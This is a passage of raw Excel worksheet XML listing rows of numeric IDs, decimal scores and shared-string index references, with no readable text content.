      </c>
      <c r="D4100">
        <v>2</v>
      </c>
      <c r="E4100">
        <v>0.58590000867843628</v>
      </c>
      <c r="F4100" t="s">
        <v>5592</v>
      </c>
      <c r="G4100" t="s">
        <v>8106</v>
      </c>
      <c r="H4100" t="s">
        <v>8107</v>
      </c>
    </row>
    <row r="4101" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4101" s="1">
        <v>4099</v>
      </c>
      <c r="B4101">
        <v>7799</v>
      </c>
      <c r="C4101">
        <v>7799</v>
      </c>
      <c r="D4101">
        <v>2</v>
      </c>
      <c r="E4101">
        <v>0.92809998989105225</v>
      </c>
      <c r="F4101" t="s">
        <v>5592</v>
      </c>
      <c r="G4101" t="s">
        <v>8108</v>
      </c>
      <c r="H4101" t="s">
        <v>8109</v>
      </c>
    </row>
    <row r="4102" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4102" s="1">
        <v>4100</v>
      </c>
      <c r="B4102">
        <v>7798</v>
      </c>
      <c r="C4102">
        <v>7798</v>
      </c>
      <c r="D4102">
        <v>2</v>
      </c>
      <c r="E4102">
        <v>0.84030002355575562</v>
      </c>
      <c r="F4102" t="s">
        <v>5592</v>
      </c>
      <c r="G4102" t="s">
        <v>8110</v>
      </c>
      <c r="H4102" t="s">
        <v>8111</v>
      </c>
    </row>
    <row r="4103" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4103" s="1">
        <v>4101</v>
      </c>
      <c r="B4103">
        <v>292</v>
      </c>
      <c r="C4103">
        <v>292</v>
      </c>
      <c r="D4103">
        <v>2</v>
      </c>
      <c r="E4103">
        <v>0.80460000038146973</v>
      </c>
      <c r="F4103" t="s">
        <v>5592</v>
      </c>
      <c r="G4103" t="s">
        <v>8112</v>
      </c>
      <c r="H4103" t="s">
        <v>8113</v>
      </c>
    </row>
    <row r="4104" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4104" s="1">
        <v>4102</v>
      </c>
      <c r="B4104">
        <v>293</v>
      </c>
      <c r="C4104">
        <v>293</v>
      </c>
      <c r="D4104">
        <v>2</v>
      </c>
      <c r="E4104">
        <v>0.81319999694824219</v>
      </c>
      <c r="F4104" t="s">
        <v>5592</v>
      </c>
      <c r="G4104" t="s">
        <v>8114</v>
      </c>
      <c r="H4104" t="s">
        <v>8115</v>
      </c>
    </row>
    <row r="4105" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4105" s="1">
        <v>4103</v>
      </c>
      <c r="B4105">
        <v>297</v>
      </c>
      <c r="C4105">
        <v>297</v>
      </c>
      <c r="D4105">
        <v>2</v>
      </c>
      <c r="E4105">
        <v>0.83389997482299805</v>
      </c>
      <c r="F4105" t="s">
        <v>5592</v>
      </c>
      <c r="G4105" t="s">
        <v>8116</v>
      </c>
      <c r="H4105" t="s">
        <v>8117</v>
      </c>
    </row>
    <row r="4106" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4106" s="1">
        <v>4104</v>
      </c>
      <c r="B4106">
        <v>7789</v>
      </c>
      <c r="C4106">
        <v>7789</v>
      </c>
      <c r="D4106">
        <v>2</v>
      </c>
      <c r="E4106">
        <v>0.46630001068115229</v>
      </c>
      <c r="F4106" t="s">
        <v>5592</v>
      </c>
      <c r="G4106" t="s">
        <v>8118</v>
      </c>
      <c r="H4106" t="s">
        <v>8119</v>
      </c>
    </row>
    <row r="4107" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4107" s="1">
        <v>4105</v>
      </c>
      <c r="B4107">
        <v>304</v>
      </c>
      <c r="C4107">
        <v>304</v>
      </c>
      <c r="D4107">
        <v>2</v>
      </c>
      <c r="E4107">
        <v>0.87330001592636108</v>
      </c>
      <c r="F4107" t="s">
        <v>5592</v>
      </c>
      <c r="G4107" t="s">
        <v>8120</v>
      </c>
      <c r="H4107" t="s">
        <v>8121</v>
      </c>
    </row>
    <row r="4108" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4108" s="1">
        <v>4106</v>
      </c>
      <c r="B4108">
        <v>305</v>
      </c>
      <c r="C4108">
        <v>305</v>
      </c>
      <c r="D4108">
        <v>2</v>
      </c>
      <c r="E4108">
        <v>0.54900002479553223</v>
      </c>
      <c r="F4108" t="s">
        <v>5592</v>
      </c>
      <c r="G4108" t="s">
        <v>8122</v>
      </c>
      <c r="H4108" t="s">
        <v>8123</v>
      </c>
    </row>
    <row r="4109" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4109" s="1">
        <v>4107</v>
      </c>
      <c r="B4109">
        <v>308</v>
      </c>
      <c r="C4109">
        <v>308</v>
      </c>
      <c r="D4109">
        <v>2</v>
      </c>
      <c r="E4109">
        <v>0.91759997606277466</v>
      </c>
      <c r="F4109" t="s">
        <v>5592</v>
      </c>
      <c r="G4109" t="s">
        <v>8124</v>
      </c>
      <c r="H4109" t="s">
        <v>8125</v>
      </c>
    </row>
    <row r="4110" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4110" s="1">
        <v>4108</v>
      </c>
      <c r="B4110">
        <v>7743</v>
      </c>
      <c r="C4110">
        <v>7743</v>
      </c>
      <c r="D4110">
        <v>2</v>
      </c>
      <c r="E4110">
        <v>0.94139999151229858</v>
      </c>
      <c r="F4110" t="s">
        <v>5592</v>
      </c>
      <c r="G4110" t="s">
        <v>8126</v>
      </c>
      <c r="H4110" t="s">
        <v>8127</v>
      </c>
    </row>
    <row r="4111" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4111" s="1">
        <v>4109</v>
      </c>
      <c r="B4111">
        <v>7788</v>
      </c>
      <c r="C4111">
        <v>7788</v>
      </c>
      <c r="D4111">
        <v>2</v>
      </c>
      <c r="E4111">
        <v>0.99330002069473267</v>
      </c>
      <c r="F4111" t="s">
        <v>5592</v>
      </c>
      <c r="G4111" t="s">
        <v>8128</v>
      </c>
      <c r="H4111" t="s">
        <v>8129</v>
      </c>
    </row>
    <row r="4112" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4112" s="1">
        <v>4110</v>
      </c>
      <c r="B4112">
        <v>325</v>
      </c>
      <c r="C4112">
        <v>325</v>
      </c>
      <c r="D4112">
        <v>2</v>
      </c>
      <c r="E4112">
        <v>0.42730000615119929</v>
      </c>
      <c r="F4112" t="s">
        <v>5592</v>
      </c>
      <c r="G4112" t="s">
        <v>8130</v>
      </c>
      <c r="H4112" t="s">
        <v>8131</v>
      </c>
    </row>
    <row r="4113" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4113" s="1">
        <v>4111</v>
      </c>
      <c r="B4113">
        <v>7772</v>
      </c>
      <c r="C4113">
        <v>7772</v>
      </c>
      <c r="D4113">
        <v>2</v>
      </c>
      <c r="E4113">
        <v>0.99800002574920654</v>
      </c>
      <c r="F4113" t="s">
        <v>5592</v>
      </c>
      <c r="G4113" t="s">
        <v>8132</v>
      </c>
      <c r="H4113" t="s">
        <v>8005</v>
      </c>
    </row>
    <row r="4114" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4114" s="1">
        <v>4112</v>
      </c>
      <c r="B4114">
        <v>7771</v>
      </c>
      <c r="C4114">
        <v>7771</v>
      </c>
      <c r="D4114">
        <v>2</v>
      </c>
      <c r="E4114">
        <v>0.99529999494552612</v>
      </c>
      <c r="F4114" t="s">
        <v>5592</v>
      </c>
      <c r="G4114" t="s">
        <v>8133</v>
      </c>
      <c r="H4114" t="s">
        <v>8134</v>
      </c>
    </row>
    <row r="4115" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4115" s="1">
        <v>4113</v>
      </c>
      <c r="B4115">
        <v>7770</v>
      </c>
      <c r="C4115">
        <v>7770</v>
      </c>
      <c r="D4115">
        <v>2</v>
      </c>
      <c r="E4115">
        <v>0.80419999361038208</v>
      </c>
      <c r="F4115" t="s">
        <v>5592</v>
      </c>
      <c r="G4115" t="s">
        <v>8135</v>
      </c>
      <c r="H4115" t="s">
        <v>8136</v>
      </c>
    </row>
    <row r="4116" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4116" s="1">
        <v>4114</v>
      </c>
      <c r="B4116">
        <v>7767</v>
      </c>
      <c r="C4116">
        <v>7767</v>
      </c>
      <c r="D4116">
        <v>2</v>
      </c>
      <c r="E4116">
        <v>0.99860000610351563</v>
      </c>
      <c r="F4116" t="s">
        <v>5592</v>
      </c>
      <c r="G4116" t="s">
        <v>8137</v>
      </c>
      <c r="H4116" t="s">
        <v>8138</v>
      </c>
    </row>
    <row r="4117" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4117" s="1">
        <v>4115</v>
      </c>
      <c r="B4117">
        <v>7765</v>
      </c>
      <c r="C4117">
        <v>7765</v>
      </c>
      <c r="D4117">
        <v>2</v>
      </c>
      <c r="E4117">
        <v>0.50069999694824219</v>
      </c>
      <c r="F4117" t="s">
        <v>5592</v>
      </c>
      <c r="G4117" t="s">
        <v>8139</v>
      </c>
      <c r="H4117" t="s">
        <v>8140</v>
      </c>
    </row>
    <row r="4118" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4118" s="1">
        <v>4116</v>
      </c>
      <c r="B4118">
        <v>346</v>
      </c>
      <c r="C4118">
        <v>346</v>
      </c>
      <c r="D4118">
        <v>2</v>
      </c>
      <c r="E4118">
        <v>0.7249000072479248</v>
      </c>
      <c r="F4118" t="s">
        <v>5592</v>
      </c>
      <c r="G4118" t="s">
        <v>8141</v>
      </c>
      <c r="H4118" t="s">
        <v>8142</v>
      </c>
    </row>
    <row r="4119" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4119" s="1">
        <v>4117</v>
      </c>
      <c r="B4119">
        <v>347</v>
      </c>
      <c r="C4119">
        <v>347</v>
      </c>
      <c r="D4119">
        <v>2</v>
      </c>
      <c r="E4119">
        <v>0.69129997491836548</v>
      </c>
      <c r="F4119" t="s">
        <v>5592</v>
      </c>
      <c r="G4119" t="s">
        <v>8143</v>
      </c>
      <c r="H4119" t="s">
        <v>8144</v>
      </c>
    </row>
    <row r="4120" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4120" s="1">
        <v>4118</v>
      </c>
      <c r="B4120">
        <v>348</v>
      </c>
      <c r="C4120">
        <v>348</v>
      </c>
      <c r="D4120">
        <v>2</v>
      </c>
      <c r="E4120">
        <v>0.97979998588562012</v>
      </c>
      <c r="F4120" t="s">
        <v>5592</v>
      </c>
      <c r="G4120" t="s">
        <v>8145</v>
      </c>
      <c r="H4120" t="s">
        <v>8146</v>
      </c>
    </row>
    <row r="4121" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4121" s="1">
        <v>4119</v>
      </c>
      <c r="B4121">
        <v>349</v>
      </c>
      <c r="C4121">
        <v>349</v>
      </c>
      <c r="D4121">
        <v>2</v>
      </c>
      <c r="E4121">
        <v>0.60159999132156372</v>
      </c>
      <c r="F4121" t="s">
        <v>5592</v>
      </c>
      <c r="G4121" t="s">
        <v>8147</v>
      </c>
      <c r="H4121" t="s">
        <v>8148</v>
      </c>
    </row>
    <row r="4122" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4122" s="1">
        <v>4120</v>
      </c>
      <c r="B4122">
        <v>7778</v>
      </c>
      <c r="C4122">
        <v>7778</v>
      </c>
      <c r="D4122">
        <v>2</v>
      </c>
      <c r="E4122">
        <v>0.99430000782012939</v>
      </c>
      <c r="F4122" t="s">
        <v>5592</v>
      </c>
      <c r="G4122" t="s">
        <v>8149</v>
      </c>
      <c r="H4122" t="s">
        <v>8150</v>
      </c>
    </row>
    <row r="4123" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4123" s="1">
        <v>4121</v>
      </c>
      <c r="B4123">
        <v>7742</v>
      </c>
      <c r="C4123">
        <v>7742</v>
      </c>
      <c r="D4123">
        <v>2</v>
      </c>
      <c r="E4123">
        <v>0.96210002899169922</v>
      </c>
      <c r="F4123" t="s">
        <v>5592</v>
      </c>
      <c r="G4123" t="s">
        <v>8151</v>
      </c>
      <c r="H4123" t="s">
        <v>8152</v>
      </c>
    </row>
    <row r="4124" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4124" s="1">
        <v>4122</v>
      </c>
      <c r="B4124">
        <v>403</v>
      </c>
      <c r="C4124">
        <v>403</v>
      </c>
      <c r="D4124">
        <v>2</v>
      </c>
      <c r="E4124">
        <v>0.71160000562667847</v>
      </c>
      <c r="F4124" t="s">
        <v>5592</v>
      </c>
      <c r="G4124" t="s">
        <v>8153</v>
      </c>
      <c r="H4124" t="s">
        <v>8154</v>
      </c>
    </row>
    <row r="4125" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4125" s="1">
        <v>4123</v>
      </c>
      <c r="B4125">
        <v>7740</v>
      </c>
      <c r="C4125">
        <v>7740</v>
      </c>
      <c r="D4125">
        <v>2</v>
      </c>
      <c r="E4125">
        <v>0.9090999960899353</v>
      </c>
      <c r="F4125" t="s">
        <v>5592</v>
      </c>
      <c r="G4125" t="s">
        <v>8155</v>
      </c>
      <c r="H4125" t="s">
        <v>8156</v>
      </c>
    </row>
    <row r="4126" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4126" s="1">
        <v>4124</v>
      </c>
      <c r="B4126">
        <v>7723</v>
      </c>
      <c r="C4126">
        <v>7723</v>
      </c>
      <c r="D4126">
        <v>2</v>
      </c>
      <c r="E4126">
        <v>0.99400001764297485</v>
      </c>
      <c r="F4126" t="s">
        <v>5592</v>
      </c>
      <c r="G4126" t="s">
        <v>8157</v>
      </c>
      <c r="H4126" t="s">
        <v>8158</v>
      </c>
    </row>
    <row r="4127" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4127" s="1">
        <v>4125</v>
      </c>
      <c r="B4127">
        <v>7722</v>
      </c>
      <c r="C4127">
        <v>7722</v>
      </c>
      <c r="D4127">
        <v>2</v>
      </c>
      <c r="E4127">
        <v>0.56510001420974731</v>
      </c>
      <c r="F4127" t="s">
        <v>5592</v>
      </c>
      <c r="G4127" t="s">
        <v>8159</v>
      </c>
      <c r="H4127" t="s">
        <v>8160</v>
      </c>
    </row>
    <row r="4128" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4128" s="1">
        <v>4126</v>
      </c>
      <c r="B4128">
        <v>462</v>
      </c>
      <c r="C4128">
        <v>462</v>
      </c>
      <c r="D4128">
        <v>2</v>
      </c>
      <c r="E4128">
        <v>0.99550002813339233</v>
      </c>
      <c r="F4128" t="s">
        <v>5592</v>
      </c>
      <c r="G4128" t="s">
        <v>8161</v>
      </c>
      <c r="H4128" t="s">
        <v>8162</v>
      </c>
    </row>
    <row r="4129" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4129" s="1">
        <v>4127</v>
      </c>
      <c r="B4129">
        <v>467</v>
      </c>
      <c r="C4129">
        <v>467</v>
      </c>
      <c r="D4129">
        <v>2</v>
      </c>
      <c r="E4129">
        <v>0.93320000171661377</v>
      </c>
      <c r="F4129" t="s">
        <v>5592</v>
      </c>
      <c r="G4129" t="s">
        <v>8163</v>
      </c>
      <c r="H4129" t="s">
        <v>8164</v>
      </c>
    </row>
    <row r="4130" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4130" s="1">
        <v>4128</v>
      </c>
      <c r="B4130">
        <v>7718</v>
      </c>
      <c r="C4130">
        <v>7718</v>
      </c>
      <c r="D4130">
        <v>2</v>
      </c>
      <c r="E4130">
        <v>0.55119997262954712</v>
      </c>
      <c r="F4130" t="s">
        <v>5592</v>
      </c>
      <c r="G4130" t="s">
        <v>8165</v>
      </c>
      <c r="H4130" t="s">
        <v>8166</v>
      </c>
    </row>
    <row r="4131" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4131" s="1">
        <v>4129</v>
      </c>
      <c r="B4131">
        <v>7717</v>
      </c>
      <c r="C4131">
        <v>7717</v>
      </c>
      <c r="D4131">
        <v>2</v>
      </c>
      <c r="E4131">
        <v>0.99750000238418579</v>
      </c>
      <c r="F4131" t="s">
        <v>5592</v>
      </c>
      <c r="G4131" t="s">
        <v>8167</v>
      </c>
      <c r="H4131" t="s">
        <v>8168</v>
      </c>
    </row>
    <row r="4132" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4132" s="1">
        <v>4130</v>
      </c>
      <c r="B4132">
        <v>475</v>
      </c>
      <c r="C4132">
        <v>475</v>
      </c>
      <c r="D4132">
        <v>2</v>
      </c>
      <c r="E4132">
        <v>0.80769997835159302</v>
      </c>
      <c r="F4132" t="s">
        <v>5592</v>
      </c>
      <c r="G4132" t="s">
        <v>8169</v>
      </c>
      <c r="H4132" t="s">
        <v>8170</v>
      </c>
    </row>
    <row r="4133" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4133" s="1">
        <v>4131</v>
      </c>
      <c r="B4133">
        <v>482</v>
      </c>
      <c r="C4133">
        <v>482</v>
      </c>
      <c r="D4133">
        <v>2</v>
      </c>
      <c r="E4133">
        <v>0.98530000448226929</v>
      </c>
      <c r="F4133" t="s">
        <v>5592</v>
      </c>
      <c r="G4133" t="s">
        <v>8171</v>
      </c>
      <c r="H4133" t="s">
        <v>8172</v>
      </c>
    </row>
    <row r="4134" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4134" s="1">
        <v>4132</v>
      </c>
      <c r="B4134">
        <v>7706</v>
      </c>
      <c r="C4134">
        <v>7706</v>
      </c>
      <c r="D4134">
        <v>2</v>
      </c>
      <c r="E4134">
        <v>0.76389998197555542</v>
      </c>
      <c r="F4134" t="s">
        <v>5592</v>
      </c>
      <c r="G4134" t="s">
        <v>8173</v>
      </c>
      <c r="H4134" t="s">
        <v>8174</v>
      </c>
    </row>
    <row r="4135" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4135" s="1">
        <v>4133</v>
      </c>
      <c r="B4135">
        <v>488</v>
      </c>
      <c r="C4135">
        <v>488</v>
      </c>
      <c r="D4135">
        <v>2</v>
      </c>
      <c r="E4135">
        <v>0.51260000467300415</v>
      </c>
      <c r="F4135" t="s">
        <v>5592</v>
      </c>
      <c r="G4135" t="s">
        <v>8175</v>
      </c>
      <c r="H4135" t="s">
        <v>8176</v>
      </c>
    </row>
    <row r="4136" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4136" s="1">
        <v>4134</v>
      </c>
      <c r="B4136">
        <v>456</v>
      </c>
      <c r="C4136">
        <v>456</v>
      </c>
      <c r="D4136">
        <v>2</v>
      </c>
      <c r="E4136">
        <v>0.86949998140335083</v>
      </c>
      <c r="F4136" t="s">
        <v>5592</v>
      </c>
      <c r="G4136" t="s">
        <v>8177</v>
      </c>
      <c r="H4136" t="s">
        <v>8178</v>
      </c>
    </row>
    <row r="4137" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4137" s="1">
        <v>4135</v>
      </c>
      <c r="B4137">
        <v>489</v>
      </c>
      <c r="C4137">
        <v>489</v>
      </c>
      <c r="D4137">
        <v>2</v>
      </c>
      <c r="E4137">
        <v>0.69330000877380371</v>
      </c>
      <c r="F4137" t="s">
        <v>5592</v>
      </c>
      <c r="G4137" t="s">
        <v>8179</v>
      </c>
      <c r="H4137" t="s">
        <v>7513</v>
      </c>
    </row>
    <row r="4138" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4138" s="1">
        <v>4136</v>
      </c>
      <c r="B4138">
        <v>492</v>
      </c>
      <c r="C4138">
        <v>492</v>
      </c>
      <c r="D4138">
        <v>2</v>
      </c>
      <c r="E4138">
        <v>0.9406999945640564</v>
      </c>
      <c r="F4138" t="s">
        <v>5592</v>
      </c>
      <c r="G4138" t="s">
        <v>8180</v>
      </c>
      <c r="H4138" t="s">
        <v>8181</v>
      </c>
    </row>
    <row r="4139" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4139" s="1">
        <v>4137</v>
      </c>
      <c r="B4139">
        <v>7702</v>
      </c>
      <c r="C4139">
        <v>7702</v>
      </c>
      <c r="D4139">
        <v>2</v>
      </c>
      <c r="E4139">
        <v>0.76090002059936523</v>
      </c>
      <c r="F4139" t="s">
        <v>5592</v>
      </c>
      <c r="G4139" t="s">
        <v>8182</v>
      </c>
      <c r="H4139" t="s">
        <v>8183</v>
      </c>
    </row>
    <row r="4140" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4140" s="1">
        <v>4138</v>
      </c>
      <c r="B4140">
        <v>7701</v>
      </c>
      <c r="C4140">
        <v>7701</v>
      </c>
      <c r="D4140">
        <v>2</v>
      </c>
      <c r="E4140">
        <v>0.99330002069473267</v>
      </c>
      <c r="F4140" t="s">
        <v>5592</v>
      </c>
      <c r="G4140" t="s">
        <v>8184</v>
      </c>
      <c r="H4140" t="s">
        <v>8185</v>
      </c>
    </row>
    <row r="4141" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4141" s="1">
        <v>4139</v>
      </c>
      <c r="B4141">
        <v>500</v>
      </c>
      <c r="C4141">
        <v>500</v>
      </c>
      <c r="D4141">
        <v>2</v>
      </c>
      <c r="E4141">
        <v>0.64090001583099365</v>
      </c>
      <c r="F4141" t="s">
        <v>5592</v>
      </c>
      <c r="G4141" t="s">
        <v>8186</v>
      </c>
      <c r="H4141" t="s">
        <v>8187</v>
      </c>
    </row>
    <row r="4142" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4142" s="1">
        <v>4140</v>
      </c>
      <c r="B4142">
        <v>502</v>
      </c>
      <c r="C4142">
        <v>502</v>
      </c>
      <c r="D4142">
        <v>2</v>
      </c>
      <c r="E4142">
        <v>0.88200002908706665</v>
      </c>
      <c r="F4142" t="s">
        <v>5592</v>
      </c>
      <c r="G4142" t="s">
        <v>8188</v>
      </c>
      <c r="H4142" t="s">
        <v>8189</v>
      </c>
    </row>
    <row r="4143" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4143" s="1">
        <v>4141</v>
      </c>
      <c r="B4143">
        <v>503</v>
      </c>
      <c r="C4143">
        <v>503</v>
      </c>
      <c r="D4143">
        <v>2</v>
      </c>
      <c r="E4143">
        <v>0.59689998626708984</v>
      </c>
      <c r="F4143" t="s">
        <v>5592</v>
      </c>
      <c r="G4143" t="s">
        <v>8190</v>
      </c>
      <c r="H4143" t="s">
        <v>8191</v>
      </c>
    </row>
    <row r="4144" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4144" s="1">
        <v>4142</v>
      </c>
      <c r="B4144">
        <v>7700</v>
      </c>
      <c r="C4144">
        <v>7700</v>
      </c>
      <c r="D4144">
        <v>2</v>
      </c>
      <c r="E4144">
        <v>0.95759999752044678</v>
      </c>
      <c r="F4144" t="s">
        <v>5592</v>
      </c>
      <c r="G4144" t="s">
        <v>8192</v>
      </c>
      <c r="H4144" t="s">
        <v>8193</v>
      </c>
    </row>
    <row r="4145" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4145" s="1">
        <v>4143</v>
      </c>
      <c r="B4145">
        <v>513</v>
      </c>
      <c r="C4145">
        <v>513</v>
      </c>
      <c r="D4145">
        <v>2</v>
      </c>
      <c r="E4145">
        <v>0.57130002975463867</v>
      </c>
      <c r="F4145" t="s">
        <v>5592</v>
      </c>
      <c r="G4145" t="s">
        <v>8194</v>
      </c>
      <c r="H4145" t="s">
        <v>8195</v>
      </c>
    </row>
    <row r="4146" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4146" s="1">
        <v>4144</v>
      </c>
      <c r="B4146">
        <v>514</v>
      </c>
      <c r="C4146">
        <v>514</v>
      </c>
      <c r="D4146">
        <v>2</v>
      </c>
      <c r="E4146">
        <v>0.35530000925064092</v>
      </c>
      <c r="F4146" t="s">
        <v>5592</v>
      </c>
      <c r="G4146" t="s">
        <v>8196</v>
      </c>
      <c r="H4146" t="s">
        <v>8197</v>
      </c>
    </row>
    <row r="4147" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4147" s="1">
        <v>4145</v>
      </c>
      <c r="B4147">
        <v>518</v>
      </c>
      <c r="C4147">
        <v>518</v>
      </c>
      <c r="D4147">
        <v>2</v>
      </c>
      <c r="E4147">
        <v>0.69480001926422119</v>
      </c>
      <c r="F4147" t="s">
        <v>5592</v>
      </c>
      <c r="G4147" t="s">
        <v>8198</v>
      </c>
      <c r="H4147" t="s">
        <v>8199</v>
      </c>
    </row>
    <row r="4148" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4148" s="1">
        <v>4146</v>
      </c>
      <c r="B4148">
        <v>490</v>
      </c>
      <c r="C4148">
        <v>490</v>
      </c>
      <c r="D4148">
        <v>2</v>
      </c>
      <c r="E4148">
        <v>0.68239998817443848</v>
      </c>
      <c r="F4148" t="s">
        <v>5592</v>
      </c>
      <c r="G4148" t="s">
        <v>8200</v>
      </c>
      <c r="H4148" t="s">
        <v>8201</v>
      </c>
    </row>
    <row r="4149" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4149" s="1">
        <v>4147</v>
      </c>
      <c r="B4149">
        <v>7807</v>
      </c>
      <c r="C4149">
        <v>7807</v>
      </c>
      <c r="D4149">
        <v>2</v>
      </c>
      <c r="E4149">
        <v>0.6492999792098999</v>
      </c>
      <c r="F4149" t="s">
        <v>5592</v>
      </c>
      <c r="G4149" t="s">
        <v>8202</v>
      </c>
      <c r="H4149" t="s">
        <v>8203</v>
      </c>
    </row>
    <row r="4150" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4150" s="1">
        <v>4148</v>
      </c>
      <c r="B4150">
        <v>7724</v>
      </c>
      <c r="C4150">
        <v>7724</v>
      </c>
      <c r="D4150">
        <v>2</v>
      </c>
      <c r="E4150">
        <v>0.63599997758865356</v>
      </c>
      <c r="F4150" t="s">
        <v>5592</v>
      </c>
      <c r="G4150" t="s">
        <v>8204</v>
      </c>
      <c r="H4150" t="s">
        <v>8205</v>
      </c>
    </row>
    <row r="4151" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4151" s="1">
        <v>4149</v>
      </c>
      <c r="B4151">
        <v>453</v>
      </c>
      <c r="C4151">
        <v>453</v>
      </c>
      <c r="D4151">
        <v>2</v>
      </c>
      <c r="E4151">
        <v>0.56620001792907715</v>
      </c>
      <c r="F4151" t="s">
        <v>5592</v>
      </c>
      <c r="G4151" t="s">
        <v>8206</v>
      </c>
      <c r="H4151" t="s">
        <v>8207</v>
      </c>
    </row>
    <row r="4152" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4152" s="1">
        <v>4150</v>
      </c>
      <c r="B4152">
        <v>405</v>
      </c>
      <c r="C4152">
        <v>405</v>
      </c>
      <c r="D4152">
        <v>2</v>
      </c>
      <c r="E4152">
        <v>0.69209998846054077</v>
      </c>
      <c r="F4152" t="s">
        <v>5592</v>
      </c>
      <c r="G4152" t="s">
        <v>8208</v>
      </c>
      <c r="H4152" t="s">
        <v>8209</v>
      </c>
    </row>
    <row r="4153" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4153" s="1">
        <v>4151</v>
      </c>
      <c r="B4153">
        <v>7739</v>
      </c>
      <c r="C4153">
        <v>7739</v>
      </c>
      <c r="D4153">
        <v>2</v>
      </c>
      <c r="E4153">
        <v>0.83090001344680786</v>
      </c>
      <c r="F4153" t="s">
        <v>5592</v>
      </c>
      <c r="G4153" t="s">
        <v>8210</v>
      </c>
      <c r="H4153" t="s">
        <v>8211</v>
      </c>
    </row>
    <row r="4154" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4154" s="1">
        <v>4152</v>
      </c>
      <c r="B4154">
        <v>7738</v>
      </c>
      <c r="C4154">
        <v>7738</v>
      </c>
      <c r="D4154">
        <v>2</v>
      </c>
      <c r="E4154">
        <v>0.67489999532699585</v>
      </c>
      <c r="F4154" t="s">
        <v>5592</v>
      </c>
      <c r="G4154" t="s">
        <v>8212</v>
      </c>
      <c r="H4154" t="s">
        <v>8213</v>
      </c>
    </row>
    <row r="4155" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4155" s="1">
        <v>4153</v>
      </c>
      <c r="B4155">
        <v>412</v>
      </c>
      <c r="C4155">
        <v>412</v>
      </c>
      <c r="D4155">
        <v>2</v>
      </c>
      <c r="E4155">
        <v>0.76990002393722534</v>
      </c>
      <c r="F4155" t="s">
        <v>5592</v>
      </c>
      <c r="G4155" t="s">
        <v>8214</v>
      </c>
      <c r="H4155" t="s">
        <v>8215</v>
      </c>
    </row>
    <row r="4156" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4156" s="1">
        <v>4154</v>
      </c>
      <c r="B4156">
        <v>413</v>
      </c>
      <c r="C4156">
        <v>413</v>
      </c>
      <c r="D4156">
        <v>2</v>
      </c>
      <c r="E4156">
        <v>0.98739999532699585</v>
      </c>
      <c r="F4156" t="s">
        <v>5592</v>
      </c>
      <c r="G4156" t="s">
        <v>8216</v>
      </c>
      <c r="H4156" t="s">
        <v>8217</v>
      </c>
    </row>
    <row r="4157" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4157" s="1">
        <v>4155</v>
      </c>
      <c r="B4157">
        <v>414</v>
      </c>
      <c r="C4157">
        <v>414</v>
      </c>
      <c r="D4157">
        <v>2</v>
      </c>
      <c r="E4157">
        <v>0.4862000048160553</v>
      </c>
      <c r="F4157" t="s">
        <v>5592</v>
      </c>
      <c r="G4157" t="s">
        <v>8218</v>
      </c>
      <c r="H4157" t="s">
        <v>8219</v>
      </c>
    </row>
    <row r="4158" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4158" s="1">
        <v>4156</v>
      </c>
      <c r="B4158">
        <v>415</v>
      </c>
      <c r="C4158">
        <v>415</v>
      </c>
      <c r="D4158">
        <v>2</v>
      </c>
      <c r="E4158">
        <v>0.99769997596740723</v>
      </c>
      <c r="F4158" t="s">
        <v>5592</v>
      </c>
      <c r="G4158" t="s">
        <v>8220</v>
      </c>
      <c r="H4158" t="s">
        <v>8221</v>
      </c>
    </row>
